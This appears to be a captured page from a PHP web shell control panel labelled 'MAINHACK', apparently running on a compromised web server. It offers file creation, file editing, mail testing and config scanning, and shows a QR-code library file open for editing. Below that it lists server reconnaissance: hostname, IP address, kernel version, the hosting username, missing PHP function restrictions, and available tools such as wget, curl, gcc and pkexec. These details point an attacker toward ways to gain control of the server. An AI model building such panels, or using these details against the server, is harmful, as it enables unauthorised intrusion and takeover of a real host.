[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: GenerateQrCode.php
<?php namespace Salla\ZATCA; use chillerlan\QRCode\QRCode; use InvalidArgumentException; use chillerlan\QRCode\QROptions; class GenerateQrCode { /** * @var Tag|Tag[] $data The data or list of tags */ protected $data = []; /** * @param Tag|Tag[] $data The data or list of tags * * @throws InvalidArgumentException If the TLV data structure * contains other data than arrays and Tag instances. */ private function __construct($data) { $this->data = array_filter($data, function ($tag) { return $tag instanceof Tag; }); if (\count($this->data) === 0) { throw new InvalidArgumentException('malformed data structure'); } } /** * Initial the generator from list of tags. * * @param Tag[] $data The list of tags * * @return GenerateQrCode */ public static function fromArray(array $data): GenerateQrCode { return new self($data); } /** * Encodes an TLV data structure. * * @return string Returns a string representing the encoded TLV data structure. */ public function toTLV(): string { return implode('', array_map(function ($tag) { return (string) $tag; }, $this->data)); } /** * Encodes an TLV as base64 * * @return string Returns the TLV as base64 encode. */ public function toBase64(): string { return base64_encode($this->toTLV()); } /** * Render the QR code as base64 data image. * * @param array $options The list of options for QROption (https://github.com/chillerlan/php-qrcode) * @param string|null $file File string represent file path,name and extension * * @return string */ public function render(array $options = [], string $file = null): string { $options = new QROptions($options); return (new QRCode($options))->render($this->toBase64(), $file); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002